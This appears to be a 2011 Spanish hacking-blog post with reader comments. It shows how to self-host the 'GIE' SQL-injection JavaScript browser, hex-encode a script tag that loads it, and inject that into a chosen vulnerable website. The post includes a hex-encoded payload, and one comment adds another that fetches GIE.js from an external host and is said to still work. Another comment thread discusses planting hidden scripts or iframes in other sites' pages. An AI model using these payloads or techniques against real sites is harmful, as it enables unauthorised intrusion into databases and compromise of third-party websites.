jueves, 14 de abril de 2011

Inyectando GIE desde local.

Mientras más de uno se enganchaba a inyectarse cualquier cosa en donde no debía, llegó una nueva droga de último diseño, el GIE nos hacía a todos la vida más fácil, aunque como toda droga esta también nos crea una dependencia hasta tal punto que sin ella nos sentíamos totalmente inútiles, llamémosle mono sí.

Como se explicó anteriormente, este código javascript está alojado en un servidor al que hace la llamada para ejecutarse cuando lo utilizábamos sobre un campo imprimible en pantalla, resultante de una inyección SQL.

¿Qué pasa si GIE no está en la ruta de la web a la que llama? Fácil... ¡Qué no funciona!



Gracias a que su autor, dejó una copia del código fuente en Paste2, podremos generar nuestro propio código GIE montando un pequeño servidor en local e incluso subiendo el archivo a un servidor externo. Por mi comodidad, tengo instalado en local un servidor Xampp para este tipo de pruebas, así que copié el código en un archivo y lo dejé en la ruta raiz de mi localhost.




Para hacer la comprobación de que Apache está funcionando sin problemas, nada mejor que levantar servicios, dirigirnos a localhost junto al nombre del archivo para ver si se muestra.




Tendremos que empezar a crear nuestro código para la inyección, así que nada mejor que introducir nuestra URL en un tag <script> para invocar la llamada.

<script src='http://localhost/gie.js'/>

Para que nuestro archivo se interprete en pantalla, tendremos que pasarlo a hexadecimal y ejecutarlo, así que iremos a cualquier herramienta online que nos convierta el código.




Copiamos la retahíla de códigos y la acomodamos para que se ejecute como la tira de codes creada por PonyMagic.

((0x3c736372697074207372633d27687474703a2f2f6c6f63616c686f73742f6769652e6a73272f3e))


Nos vamos a una web vulnerable que tengamos entre ceja y ceja y probamos nuestro código.




¡Funcionando! ¡Así nadie tiene escusa para dejar la drogra!

Saludos 4n4les! ;)

7 comentarios:

  1. Con GIE a que te refieres? a inyeccion SQL pero con ese programita? y otra cosa... si soy capaz de meter < script src='www.mipagina.com'/ > en el index de otra pagina, cada vez que alguien entre en esa pagina, mi contador de visitas subira??

    ResponderEliminar
  2. @Francisco

    Con GIE me refiero a las tres primeras siglas de General Injection Explorer, la aplicación javascript que se explica. No sé exactamente a que quieres llegar con eso de inyectar el script en el index de otra web, lo que aquí se explica es un software que mediante una inyección SQL obtienes una interfaz que te permite navegar con entorno gráfico.

    ResponderEliminar
  3. OK muchas gracias por la aclaracion. con lo del script me referia lo siguiente. en la web de la empresa para la que trabajaba incluyeron unos script (que le hackearon la pagina...) que lo que hacia era llamar a otras web con el simple objeto de que le subiera las visitas (supuestamente pagaban por visitas obtenidas). entonces queria saber si la forma de hacerlo es como te indicaba en el otro comentario. Muchas gracias

    ResponderEliminar
  4. Posiblemente incrustasen un iframe no visible que cargase la web o algo similar que consiguiese ejecutarlo... si no serían simples enlaces. No desviemos.

    Saludos! ^^

    ResponderEliminar
  5. eres muy bueno socio! no sabia como hacerlo funcionar! gracias!

    ResponderEliminar
  6. MichBukana!

    Muy Bueno 4n0 nunca me paré a fijarme si se podria cambiar la dirección de donde tira el GIE

    lo voy a tener en cuenta.

    Salu2!

    ResponderEliminar
  7. Otro GIE que por ahora funciona:

    ((0x3c736372697074207372633d27687474703a2f2f736563757269747963756c6f726f746f2e636f6d2e61722f4749452e6a73272f3e))

    Saludos!

    ResponderEliminar